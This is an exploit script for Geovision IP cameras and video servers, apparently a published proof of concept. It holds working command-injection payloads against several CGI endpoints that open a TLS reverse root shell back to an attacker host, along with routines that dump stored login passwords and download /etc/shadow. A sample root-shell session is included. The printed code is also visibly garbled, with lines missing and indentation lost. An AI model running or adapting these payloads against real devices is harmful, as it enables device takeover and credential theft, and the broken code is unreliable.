Geovision Inc. IP Camera & Video - Remote Command Execution
2018-02-01 12:05:11#!/usr/bin/env python2.7
# [SOF]
# Geovision Inc. IP Camera & Video Server Remote Command Execution PoC
# Researcher: bashis <mcw noemail eu> (November 2017)
# 1. Pop stunnel TLSv1 reverse root shell [Local listener: 'ncat -vlp <LPORT> --ssl'; Verified w/ v7.60]
# 2. Dump all settings of remote IPC with Login/Passwd in cleartext
# Using:
# - CGI: 'Usersetting.cgi' (Logged in user) < v3.12 (Very old) [Used as default]
# - CGI: 'FilterSetting.cgi' (Logged in user) < v3.12 (Very old)
# - CGI: 'PictureCatch.cgi' (Anonymous) > v3.10
# - CGI: 'JpegStream.cgi' (Anonymous) > v3.10
# 3. GeoToken PoC to login and download /etc/shadow via generated token symlink
# Sample reverse shell:
# $ ncat -vlp 1337 --ssl
# Ncat: Version 7.60 ( )
# Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
# Ncat: SHA-1 fingerprint: 3469 C118 43F0 043A 5168 189B 1D67 1131 4B5B 1603
# Ncat: Listening on :::1337
# Ncat: Listening on
# Ncat: Connection from
# Ncat: Connection from
# /bin/sh: can't access tty; job control turned off
# /www # id
# id
# uid=0(root) gid=0(root)
# /www # uname -a
# uname -a
# Linux IPCAM 2.6.18_pro500-davinci #1 Mon Jun 19 21:27:10 CST 2017 armv5tejl unknown
# /www # exit
# $
import sys
import socket
import urllib, urllib2, httplib
import json
import hashlib
import commentjson # pip install commentjson
import xmltodict # pip install xmltodict
import select
import string
import argparse
import random
import base64
import ssl
import json
import os
import re
#from pwn import *
def split2len(s, n):
def _f(s, n):
while s:
yield s[:n]
s = s[n:]
return list(_f(s, n))
# Ignore download of '302 Found/Location' redirections
class NoRedirection(urllib2.HTTPErrorProcessor):
def http_response(self, request, response):
return response
https_response = http_response
class HTTPconnect:
def __init__(self, host, proto, verbose, credentials, Raw, noexploit): = host
self.proto = proto
self.verbose = verbose
self.credentials = credentials
self.Raw = Raw
self.noexploit = False
self.noexploit = noexploit
def Send(self, uri, query_headers, query_data, ID):
self.uri = uri
self.query_headers = query_headers
self.query_data = query_data
self.ID = ID
# Connect-timeout in seconds
timeout = 10
url = '{}://{}{}'.format(self.proto,, self.uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Unverified Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"password:",Basic_Auth[1]
pwd_mgr = urllib2.HTTPpasswordMgrWithDefaultDahua_realm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
if verbose:
http_logger = urllib2.HTTPHandler(debuglevel = 1) # HTTPSHandler... for HTTPS
opener = urllib2.build_opener(auth_handler,NoRedirection,http_logger)
opener = urllib2.build_opener(auth_handler,NoRedirection)
except Exception as e:
print "[!] Basic Auth Error:",e
# Don't follow redirects!
if verbose:
http_logger = urllib2.HTTPHandler(debuglevel = 1)
opener = urllib2.build_opener(http_logger,NoRedirection)
NoRedir = urllib2.build_opener(NoRedirection)
if self.noexploit and not self.verbose:
print "[<] 204 Not Sending!"
html = "Not sending any data"
return html
if self.query_data:
req = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers)
if self.ID:
Cookie = 'CLIENT_ID={}'.format(self.ID)
req.add_header('Cookie', Cookie)
req = urllib2.Request(url, None, headers=self.query_headers)
if self.ID:
Cookie = 'CLIENT_ID={}'.format(self.ID)
req.add_header('Cookie', Cookie)
rsp = urllib2.urlopen(req)
if rsp:
print "[<] {}".format(rsp.code)
if self.Raw:
return rsp
html =
return html
# Validate correctness of HOST, IP and PORT
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
class Geovision:
def __init__(self, rhost, proto, verbose, credentials, raw_request, noexploit, headers, SessionID):
self.rhost = rhost
self.proto = proto
self.verbose = verbose
self.credentials = credentials
self.raw_request = raw_request
self.noexploit = noexploit
self.headers = headers
self.SessionID = SessionID
def Login(self):
print "[>] Requesting keys from remote"
URI = '/ssi.cgi/Login.htm'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,None,None)
response =[:1500]
response = re.split('[()<>?"\n_&;/ ]',response)
# print response
except Exception as e:
print "[!] Can't access remote host... ({})".format(e)
# Geovision way to have MD5 random Login and Password
CC1 = ''
CC2 = ''
for check in range(0,len(response)):
if response[check] == 'cc1=':
CC1 = response[check+1]
print "[i] Random key CC1: {}".format(response[check+1])
elif response[check] == 'cc2=':
CC2 = response[check+1]
print "[i] Random key CC2: {}".format(response[check+1])
# Less interesting to know, but leave it here anyway.
# If the remote server has enabled guest view, these below will not be '0'
elif response[check] == 'GuestIdentify':
print "[i] GuestIdentify: {}".format(response[check+2])
elif response[check] == 'uid':
if response[check+2]:
print "[i] uid: {}".format(response[check+2])
print "[i] uid: {}".format(response[check+3])
elif response[check] == 'pid':
if response[check+2]:
print "[i] pid: {}".format(response[check+2])
print "[i] pid: {}".format(response[check+3])
if not CC1 and not CC2:
print "[!] CC1 and CC2 missing!"
print "[!] Cannot generate MD5, exiting.."
# Geovision MD5 Format
uMD5 = hashlib.md5(CC1 + username + CC2).hexdigest().upper()
pMD5 = hashlib.md5(CC2 + password + CC1).hexdigest().upper()
# print "[i] User MD5: {}".format(uMD5)
# print "[i] Pass MD5: {}".format(pMD5)
self.query_args = {
print "[>] Logging in"
URI = '/LoginPC.cgi'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
# print
# if we don't get 'Set-Cookie' back from the server, the Login has failed
if not ('Set-Cookie')):
print "[!] Login Failed!"
if verbose:
print "Cookie: {}".format('Set-Cookie'))
except Exception as e:
print "[i] What happen? ({})".format(e)
def DeviceInfo(self):
URI = '/PSIA/System/deviceInfo'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,None)
deviceinfo = xmltodict.parse(response)
print "[i] Remote target: {} ({})".format(deviceinfo['DeviceInfo']['model'],deviceinfo['DeviceInfo']['firmwareVersion'])
return True
except Exception as e:
print "[i] Info about remote target failed ({})".format(e)
return False
def UserSetting(self,DumpSettings):
self.DumpSettings = DumpSettings
if self.DumpSettings:
print "[i] Dump Config of remote"
SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
print "[i] Launching TLSv1 privacy reverse shell"
self.headers = {
'Connection': 'close',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
SH_CMD = SH_CMD.replace("LHOST",lhost)
SH_CMD = SH_CMD.replace("LPORT",lport)
print "[>] Pwning Usersetting.cgi"
self.query_args = {
URI = '/UserSetting.cgi'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
if DumpSettings:
print "[i] Dumping"
URI = '/ssi.cgi/tmp/Login.htm'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
print response
return True
except Exception as e:
if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
print "[!] Enjoy the shell... ({})".format(e)
return True
def PictureCatch(self,DumpSettings):
self.DumpSettings = DumpSettings
if self.DumpSettings:
print "[i] Dump Config of remote"
SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
print "[i] Launching TLSv1 privacy reverse shell"
self.headers = {
'Connection': 'close',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
SH_CMD = SH_CMD.replace("LHOST",lhost)
SH_CMD = SH_CMD.replace("LPORT",lport)
print "[>] Pwning PictureCatch.cgi"
self.query_args = {
URI = '/PictureCatch.cgi'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
if DumpSettings:
print "[i] Dumping"
URI = '/ssi.cgi/tmp/Login.htm'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
print response
return True
except Exception as e:
if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
print "[!] Enjoy the shell... ({})".format(e)
return True
def JpegStream(self,DumpSettings):
self.DumpSettings = DumpSettings
if self.DumpSettings:
print "[i] Dump Config of remote"
SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
print "[i] Launching TLSv1 privacy reverse shell"
self.headers = {
'Connection': 'close',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
SH_CMD = SH_CMD.replace("LHOST",lhost)
SH_CMD = SH_CMD.replace("LPORT",lport)
print "[>] Pwning JpegStream.cgi"
self.query_args = {
URI = '/JpegStream.cgi'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
if DumpSettings:
print "[i] Dumping"
URI = '/ssi.cgi/tmp/Login.htm'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
print response
return True
except Exception as e:
if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
print "[!] Enjoy the shell... ({})".format(e)
return True
# Interesting example of bad code and insufficent sanitation of user input.
# ';' is filtered in v3.12, and when found in the packet, the packet is simply ignored.
# Later in the chain the Geovision code will write provided userinput to flash, we may overwrite unwanted flash area if we playing to much here.
# So, we are limited to 31 char per line (32 MUST BE NULL), to play safe game with this bug.
# v3.10->3.12 changed how to handle ipfilter
# From:
# User input to system() call in FilterSetting.cgi to set iptable rules and then save them in flash
# To:
# User input transferred from 'FilterSetting.cgi' to flash (/dev/mtd11), and when the tickbox to activate the filter rules,
# '/usr/local/bin/geobox-iptables-reload' is triggered to read these rules from flash and '/usr/local/bin/iptables' via 'geo_net_filter_table_add'
# with system() call in ''
# Should end up into;
# 23835 root 576 S sh -c /usr/local/bin/iptables -A INPUT -s `/usr/loca...[trunkated]
# 23836 root 2428 S /usr/local/bin/stunnel /tmp/x
# 23837 root 824 S /bin/sh
def FilterSetting(self):
print "[>] Pwning FilterSetting.cgi"
# ';' will be treated by the code as LF
# Let's use some TLSv1 privacy for the reverse shell
SH_CMD = 'client=yes;connect=LHOST:LPORT;exec=/bin/sh;pty=yes;sslVersion=TLSv1'
SH_CMD = SH_CMD.replace("LHOST",lhost)
SH_CMD = SH_CMD.replace("LPORT",lport)
ShDict = SH_CMD.split(';')
MAX_SIZE = 31 # Max Size of the strings to generate
LF = 0
LINE = 0
CMD = {}
CMD_NO_LF = "`echo -n \"TMP\">>/tmp/x`"
CMD_DO_LF = "`echo \"TMP\">>/tmp/x`"
SIZE = MAX_SIZE-(len(CMD_NO_LF)-3) # Size of availible space for our input in 'SH_CMD'
# Remove, just in case
CMD[LINE] = "`rm -f /tmp/x`"
URI = '/FilterSetting.cgi'
# This loop will make the correct aligment of user input
for cmd in range(0,len(ShDict)):
CMD_LF = math.ceil(float(len(ShDict[cmd])) / SIZE)
cmd_split = split2len(ShDict[cmd], SIZE)
for CMD_LEN in range(0,len(cmd_split)):
LINE += 1
LF += 1
if (len(cmd_split[CMD_LEN]) > SIZE-1) and (CMD_LF != LF):
CMD[LINE] = CMD_NO_LF.replace("TMP",cmd_split[CMD_LEN])
CMD[LINE] = CMD_DO_LF.replace("TMP",cmd_split[CMD_LEN])
LF = 0
if verbose:
print "Len: {} {}".format(len(CMD[LINE]),CMD[LINE])
# Add two more commands to execute stunnel and remove /tmp/x
CMD[LINE+1] = "`/usr/local/bin/stunnel /tmp/x`" # 31 char, no /usr/local/bin in $PATH
CMD[LINE+2] = "`rm -f /tmp/x`" # Some bug here, think it is timing as below working
CMD[LINE+3] = "`rm -f /tmp/x`" # Working, this is only one more add/enable/disable/remove loop
# Below while() loop will create following /tmp/x, execute 'stunnel' and remove /tmp/x
# client=yes
# connect=<LHOST>:<LPORT>
# exec=/bin/sh
# pty=yes
# sslVersion=TLSv1
NEW_IP_FILTER = 1 # > v3.12
who = 0
# Clean up to make room, just in case
for Remove in range(0,4):
print "[>] Cleaning ipfilter entry: {}".format(Remove+1)
self.query_args = {
"bPolicy":"0", # 1 = Enable, 0 = Disable
"Delete":"Remove", # Remove entry
"byOpId":"0", # 0 = Allow, 1 = Deny
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
while True:
if who == len(CMD):
if CMD_LEN < 4:
print "[>] Sending: {} ({})".format(CMD[who],len(CMD[who]))
self.query_args = {
"szIpAddr":CMD[who], # 31 char limit
"byOpId":"0", # 0 = Allow, 1 = Deny
"dwSelIndex":"0", # Seems not to be in use
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
response = re.split('[()<>?"\n_&;/ ]',response)
print response
for cnt in range(0,len(response)):
if response[cnt] == 'iptables':
print "[i] Remote don't need Enable/Disable"
CMD_LEN += 1
who += 1
time.sleep(2) # Seems to be too fast without
# NEW Way
print "[>] Enabling ipfilter"
self.query_args = {
"bPolicy":"1", # 1 = Enable, 0 = Disable
"byOpId":"0", # 0 = Allow, 1 = Deny
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
print "[i] Sleeping..."
print "[>] Disabling ipfilter"
self.query_args = {
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
for Remove in range(0,4):
print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
self.query_args = {
"bPolicy":"0", # 1 = Enable, 0 = Disable
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
# OLD Way
for Remove in range(0,4):
print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
self.query_args = {
"bPolicy":"0", # 1 = Enable, 0 = Disable
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
print "[i] Last sending"
print "[>] Enabling ipfilter"
self.query_args = {
"bPolicy":"1", # 1 = Enable, 0 = Disable
"byOpId":"0", # 0 = Allow, 1 = Deny
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
print "[i] Sleeping..."
print "[>] Disabling ipfilter"
self.query_args = {
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
for Remove in range(0,4):
print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
self.query_args = {
"bPolicy":"0", # 1 = Enable, 0 = Disable
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
print "[!] Enjoy the shell... "
return True
except Exception as e:
print "[i] Last sending"
for Remove in range(0,4):
print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
self.query_args = {
"bPolicy":"0", # 1 = Enable, 0 = Disable
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
print "[!] Enjoy the shell... "
return True
print "[!] Hmm... {}".format(e)
return True
def GeoToken(self):
print "[i] GeoToken PoC to login and download /etc/shadow via token symlink"
print "[!] You must have valid login and password to generate the symlink"
# This is how to list remote *.wav and *.avi files in /storage.
print "[>] Requesting token1"
URI = '/BKCmdToken.php'
response = HTTPconnect(rhost,proto,verbose,credentials,raw_request,noexploit).Send(URI,headers,None,None)
result = json.load(response)
if verbose:
print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
print "[i] Request OK?: {}".format(result['success'])
if not result['success']:
token1 = result['token']
# "success": true,
# "token": "6fe1a7c1f34431acc7eaecba646b7caf"
# Generate correct MD5 token2
token2 = hashlib.md5(hashlib.md5(token1 + 'gEo').hexdigest() + 'vIsIon').hexdigest()
query_args = {
print "[>] List files"
URI = '/BKFileList.php'
response = HTTPconnect(rhost,proto,verbose,credentials,raw_request,noexploit).Send(URI,headers,query_args,None)
result = json.load(response)
if verbose:
print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
for who in result.keys():
print len(who)
# "files": [
# {
# "file_size": "2904170",
# "filename": "event20171105104946001.avi",
# "remote_path": "/storage/hd11-1/GV-MFD1501-0a99a9/cam01/2017/11/05"
# },
# {}
# ]
# Request remote MD5 token1
print "[>] Requesting token1"
URI = '/BKCmdToken.php'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,None,None)
result = json.load(response)
if verbose:
print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
print "[i] Request OK?: {}".format(result['success'])
if not result['success']:
return False
token1 = result['token']
# "success": true,
# "token": "6fe1a7c1f34431acc7eaecba646b7caf"
# Generate correct MD5 token2
# MD5 Format: <login>:<token1>:<password>
token2 = hashlib.md5(username + ':' + token1 + ':' + password).hexdigest()
# symlink this file for us
filename = '/etc/shadow'
self.query_args = {
print "[>] Requesting download file link"
URI = '/BKDownloadLink.cgi'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,None)
response =[:900]
response = response.replace("'", "\"")
result = json.loads(response)
print "[i] Request OK?: {}".format(result['success'])
if not result['success']:
return False
if verbose:
print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
# "dl_folder": "/tmp",
# "dl_token": "C71689493825787.dltoken",
# "err_code": 0,
# "success": true
URI = '/ssi.cgi' + result['dl_folder'] + '/' + result['dl_token']
print "[>] downloading ({}) with ({})".format(filename,URI)
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,None)
response =
print response
return True
except Exception as e:
print "[i] GEO Token fail ({})".format(e)
return False
if __name__ == '__main__':
# Help, info and pre-defined values
INFO = '[Geovision Inc. IPC/IPV RCE PoCs (2017 bashis <mcw noemail eu>)]\n'
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
noexploit = False
raw_request = True
rhost = '' # Default Remote HOST
rport = '80' # Default Remote PORT
lhost = '' # Default Local HOST
lport = '1337' # Default Local PORT
# creds = 'root:pass'
credentials = False
# Geovision stuff
SessionID = str(int(random.random() * 100000))
DumpSettings = False
deviceinfo = False
GEOtoken = False
anonymous = False
filtersetting = False
usersetting = False
jpegstream = False
picturecatch = False
# Geovision default
username = 'admin'
password = 'admin'
# Try to parse all arguments
arg_parser = argparse.ArgumentParser(
description=('[*] '+ INFO +' [*]'))
arg_parser.add_argument('--rhost', required=True, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=True, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
arg_parser.add_argument('--autoip', required=False, default=False, action='store_true', help='Detect External Connect Back IP [Default: False]')
arg_parser.add_argument('--deviceinfo', required=False, default=False, action='store_true', help='Request model and firmware version')
arg_parser.add_argument('-g','--geotoken', required=False, default=False, action='store_true', help='Try retrieve /etc/shadow with geotoken')
arg_parser.add_argument('-a','--anonymous', required=False, default=False, action='store_true', help='Try pwning as anonymous')
arg_parser.add_argument('-f','--filtersetting', required=False, default=False, action='store_true', help='Try pwning with FilterSetting.cgi')
arg_parser.add_argument('-p','--picturecatch', required=False, default=False, action='store_true', help='Try pwning with PictureCatch.cgi')
arg_parser.add_argument('-j','--jpegstream', required=False, default=False, action='store_true', help='Try pwning with JpegStream.cgi')
arg_parser.add_argument('-u','--usersetting', required=False, default=False, action='store_true', help='Try pwning with UserSetting.cgi')
arg_parser.add_argument('-d','--dump', required=False, default=False, action='store_true', help='Try pwning remote config')
arg_parser.add_argument('--username', required=False, help='Username [Default: '+ username +']')
arg_parser.add_argument('--password', required=False, help='password [Default: '+ password +']')
if credentials:
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ credentials + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: {}\n".format(str(e))
print "\n[*]",INFO
if args.verbose:
verbose = args.verbose
# Check validity, update if needed, of provided options
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'
if credentials and args.auth:
credentials = args.auth
if args.geotoken:
GEOtoken = args.geotoken
if args.anonymous:
anonymous = True
if args.deviceinfo:
deviceinfo = True
if args.dump:
DumpSettings = True
if args.filtersetting:
FilterSetting = True
if args.usersetting:
usersetting = True
if args.jpegstream:
jpegstream = True
if args.picturecatch:
picturecatch = True
if args.username:
username = args.username
if args.password:
password = args.password
if args.noexploit:
noexploit = args.noexploit
if args.rport:
rport = args.rport
if args.rhost:
rhost = args.rhost
IP = args.rhost
if args.lport:
lport = args.lport
if args.lhost:
lhost = args.lhost
elif args.autoip:
# HTTP check of our external IP
headers = {
'Connection': 'close',
'Accept' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
print "[>] Trying to find out my external IP"
lhost = HTTPconnect("",proto,verbose,credentials,False,noexploit).Send("/",headers,None,None)
if verbose:
print "[Verbose] Detected my external IP:",lhost
except Exception as e:
print "[<] ",e
# Check if RPORT is valid
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
# Check if LHOST is valid IP or FQDN, get IP back
lhost = Validate(verbose).Host(lhost)
if not lhost:
print "[!] Invalid LHOST"
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
# Validation done, start print out stuff to the user
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:",rhost
print "[i] Remote target PORT:",rport
if not args.geotoken and not args.dump and not args.deviceinfo:
print "[i] Connect back IP:",lhost
print "[i] Connect back PORT:",lport
rhost = rhost + ':' + rport
headers = {
'Connection': 'close',
'Content-Type' : 'application/x-www-form-urlencoded',
'Accept' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
# Print Model and Firmware version
if deviceinfo:
# Geovision token login within the function
if GEOtoken:
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).GeoToken():
print "[!] Failed"
if anonymous:
if jpegstream:
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).JpegStream(DumpSettings):
print "[!] Failed"
elif picturecatch:
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).PictureCatch(DumpSettings):
print "[!] Failed"
print "[!] Needed: --anonymous [--picturecatch | --jpegstream]"
# Geovision Login needed
if usersetting:
if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).UserSetting(DumpSettings):
print "[!] Failed"
elif filtersetting:
if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).FilterSetting():
print "[!] Failed"
elif jpegstream:
if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).JpegStream(DumpSettings):
print "[!] Failed"
elif picturecatch:
if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).PictureCatch(DumpSettings):
print "[!] Failed"
print "[!] Needed: --usersetting | --jpegstream | --picturecatch | --filtersetting"
# [EOF]
